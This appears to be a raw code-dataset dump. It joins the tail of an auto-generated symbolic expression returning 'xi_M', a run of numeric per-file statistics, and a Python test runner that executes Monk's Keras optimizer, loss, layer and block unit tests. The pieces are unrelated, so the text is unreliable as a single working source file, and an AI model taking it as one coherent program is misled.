exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0) + dy0*(dx0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dy0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0))*x_norm**46.0*exp((15*sigma_alpha**2 + 26*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)) + (dx0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dx0*sigma_alpha**2*z0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dx0*sigma_gamma**2*z0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) - dz0*sigma_alpha**2*sigma_gamma**2*x0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dy0*y0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))) + dy0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dy0*sigma_alpha**2*z0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dy0*sigma_gamma**2*z0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) - dz0*sigma_alpha**2*sigma_gamma**2*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))))*x_norm**46.0*exp((23*sigma_alpha**2 + 40*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp(-(31*sigma_alpha**2 + 53*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))/(sigma_alpha**2*sigma_gamma**2*(exp(2*alpha*x_norm**0.5) + 1)**3)]
])
return xi_M
| 1,246.333333
| 18,843
| 0.615271
| 14,806
| 59,824
| 2.287383
| 0.00412
| 0.19739
| 0.218266
| 0.108513
| 0.994892
| 0.994567
| 0.994567
| 0.994567
| 0.994301
| 0.994301
| 0
| 0.132077
| 0.054978
| 59,824
| 47
| 18,844
| 1,272.851064
| 0.466967
| 0.002925
| 0
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.074074
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fa7b41626dc1421fbea2b0da9de7263b6815914a
| 30,399
|
py
|
Python
|
monk/system_unit_tests/keras/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 542
|
2019-11-10T12:09:31.000Z
|
2022-03-28T11:39:07.000Z
|
monk/system_unit_tests/keras/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 117
|
2019-11-12T09:39:24.000Z
|
2022-03-12T00:20:41.000Z
|
monk/system_unit_tests/keras/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 246
|
2019-11-09T21:53:24.000Z
|
2022-03-29T00:57:07.000Z
|
import os
import sys
import time
from test_optimizer_sgd import test_optimizer_sgd
from test_optimizer_nesterov_sgd import test_optimizer_nesterov_sgd
from test_optimizer_rmsprop import test_optimizer_rmsprop
from test_optimizer_adam import test_optimizer_adam
from test_optimizer_nadam import test_optimizer_nadam
from test_optimizer_adamax import test_optimizer_adamax
from test_optimizer_adadelta import test_optimizer_adadelta
from test_optimizer_adagrad import test_optimizer_adagrad
from test_loss_l1 import test_loss_l1
from test_loss_l2 import test_loss_l2
from test_loss_crossentropy import test_loss_crossentropy
from test_loss_binary_crossentropy import test_loss_binary_crossentropy
from test_loss_kldiv import test_loss_kldiv
from test_loss_hinge import test_loss_hinge
from test_loss_squared_hinge import test_loss_squared_hinge
origstdout = sys.stdout
print("Running Tests...");
sys.stdout = open("test_logs.txt", 'w');
system_dict = {};
system_dict["total_tests"] = 0;
system_dict["successful_tests"] = 0;
system_dict["failed_tests_lists"] = [];
system_dict["failed_tests_exceptions"] = [];
system_dict["skipped_tests_lists"] = [];
start = time.time()
exp_num = 1;
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nesterov_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_rmsprop(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nadam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adamax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adadelta(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adagrad(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_binary_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_kldiv(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_squared_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
from test_layer_convolution1d import test_layer_convolution1d
from test_layer_convolution2d import test_layer_convolution2d
from test_layer_convolution3d import test_layer_convolution3d
from test_layer_transposed_convolution2d import test_layer_transposed_convolution2d
from test_layer_transposed_convolution3d import test_layer_transposed_convolution3d
from test_layer_max_pooling1d import test_layer_max_pooling1d
from test_layer_max_pooling2d import test_layer_max_pooling2d
from test_layer_max_pooling3d import test_layer_max_pooling3d
from test_layer_average_pooling1d import test_layer_average_pooling1d
from test_layer_average_pooling2d import test_layer_average_pooling2d
from test_layer_average_pooling3d import test_layer_average_pooling3d
from test_layer_global_max_pooling1d import test_layer_global_max_pooling1d
from test_layer_global_max_pooling2d import test_layer_global_max_pooling2d
from test_layer_global_max_pooling3d import test_layer_global_max_pooling3d
from test_layer_global_average_pooling1d import test_layer_global_average_pooling1d
from test_layer_global_average_pooling2d import test_layer_global_average_pooling2d
from test_layer_global_average_pooling3d import test_layer_global_average_pooling3d
from test_layer_batch_normalization import test_layer_batch_normalization
from test_layer_identity import test_layer_identity
from test_layer_fully_connected import test_layer_fully_connected
from test_layer_dropout import test_layer_dropout
from test_layer_flatten import test_layer_flatten
from test_layer_concatenate import test_layer_concatenate
from test_layer_add import test_layer_add
from test_activation_relu import test_activation_relu
from test_activation_softmax import test_activation_softmax
from test_activation_thresholded_relu import test_activation_thresholded_relu
from test_activation_elu import test_activation_elu
from test_activation_prelu import test_activation_prelu
from test_activation_leaky_relu import test_activation_leaky_relu
from test_activation_selu import test_activation_selu
from test_activation_softplus import test_activation_softplus
from test_activation_softsign import test_activation_softsign
from test_activation_tanh import test_activation_tanh
from test_activation_sigmoid import test_activation_sigmoid
from test_activation_hard_sigmoid import test_activation_hard_sigmoid
from test_initializer_xavier_normal import test_initializer_xavier_normal
from test_initializer_xavier_uniform import test_initializer_xavier_uniform
from test_initializer_random_normal import test_initializer_random_normal
from test_initializer_random_uniform import test_initializer_random_uniform
from test_initializer_lecun_normal import test_initializer_lecun_normal
from test_initializer_lecun_uniform import test_initializer_lecun_uniform
from test_initializer_he_normal import test_initializer_he_normal
from test_initializer_he_uniform import test_initializer_he_uniform
from test_initializer_truncated_normal import test_initializer_truncated_normal
from test_initializer_orthogonal import test_initializer_orthogonal
from test_initializer_variance_scaling import test_initializer_variance_scaling
from test_block_resnet_v1 import test_block_resnet_v1
from test_block_resnet_v2 import test_block_resnet_v2
from test_block_resnet_v1_bottleneck import test_block_resnet_v1_bottleneck
from test_block_resnet_v2_bottleneck import test_block_resnet_v2_bottleneck
from test_block_resnext import test_block_resnext
from test_block_mobilenet_v2_linear_bottleneck import test_block_mobilenet_v2_linear_bottleneck
from test_block_mobilenet_v2_inverted_linear_bottleneck import test_block_mobilenet_v2_inverted_linear_bottleneck
from test_block_squeezenet_fire import test_block_squeezenet_fire
from test_block_densenet import test_block_densenet
from test_block_conv_bn_relu import test_block_conv_bn_relu
from test_block_inception_a import test_block_inception_a
from test_block_inception_b import test_block_inception_b
from test_block_inception_c import test_block_inception_c
from test_block_inception_d import test_block_inception_d
from test_block_inception_e import test_block_inception_e
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
